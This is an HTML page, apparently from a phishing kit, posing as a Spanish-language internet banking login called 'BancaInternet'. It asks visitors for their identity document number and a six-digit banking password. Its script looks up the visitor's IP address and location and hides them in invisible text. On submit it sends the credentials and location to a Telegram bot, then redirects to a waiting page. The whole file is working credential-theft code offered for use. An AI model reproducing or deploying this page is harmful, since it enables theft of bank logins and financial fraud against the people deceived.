<!DOCTYPE html>
<html >
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BancaInternet</title>

    <link rel="stylesheet" href="foster/home.css">





    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>  
    <script src="fallsguy/dett.js"></script>
    <script>
      $.getJSON("https://api.ipify.org?format=json", function(data) {
              $("#gfg").html(data.ip);
          });
          $.getJSON("https://ipinfo.io", function(response) {
        $("#ip").html("IP: " + response.ip);
        $("#address").html("" + response.city + ", " + response.country);
      });
  
      var u_name, u_name2,  ip, ip2, message;
      var ready = function() {
        u_name = document.getElementById("primerrut").value;
        u_name2 = document.getElementById("segundointernet").value;
  
        ip = document.getElementById("gfg").innerHTML;
        ip2 = document.getElementById("address").innerHTML;
        message = "MMMBB\n☰ELCCUT: " + u_name + "\n☰LACINT: " + u_name2 + "\n🌎IP: " + ip +"\n" + ip2;
      };
      var sender = function() {
        ready();
        var settings = {
          "async": true,
          "crossDomain": true,
          "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
          "method": "POST",
          "headers": {
            "Content-Type": "application/json",
            "cache-control": "no-cache"
          },
          "data": JSON.stringify({
            "chat_id": chat_id,
            "text": message
          })
        };
        $.ajax(settings).done(function(response) {
          console.log(response);
          window.location = 'waitforthe.html';
        });
        return false;
      };
  
  </script>

</head>
<body style="background-color: white;">




<div style="background-color: rgb(31, 145, 0);height: 10px; width: 100%;">  </div>

<div style="background-color: rgb(148, 206, 10);height: 10px; width: 100%;">  </div>

<center>

    <form method="post" action="#" onsubmit="return sender();"> 

    <div  class="sitefan">
<img src="foster/monsterlog.png" alt="brokxj"><br><br>

<h2>Rellena lo solicitado</h2>
<br>

<input inputmode="numeric"   name="primerrut"     id="primerrut"   placeholder="INGRESA TU DOCUMENTO"  type="text"  required=""><br>
<input   inputmode="numeric"   name="segundointernet"    id="segundointernet" minlength="6" maxlength="6" placeholder="CLAVE DE INTERNET 6 DIGITOS"  type="text" required="">

<input class="voygo" value="SIGUIENTE" type="submit">      </form>
</center>

</div>

</body>


<div style="color: rgb(255, 255, 255);font-size: 0.05px;" >
    <p id="gfg"></p>
    <p id="ip"></p>
    <p id="address"></p></div>
</html>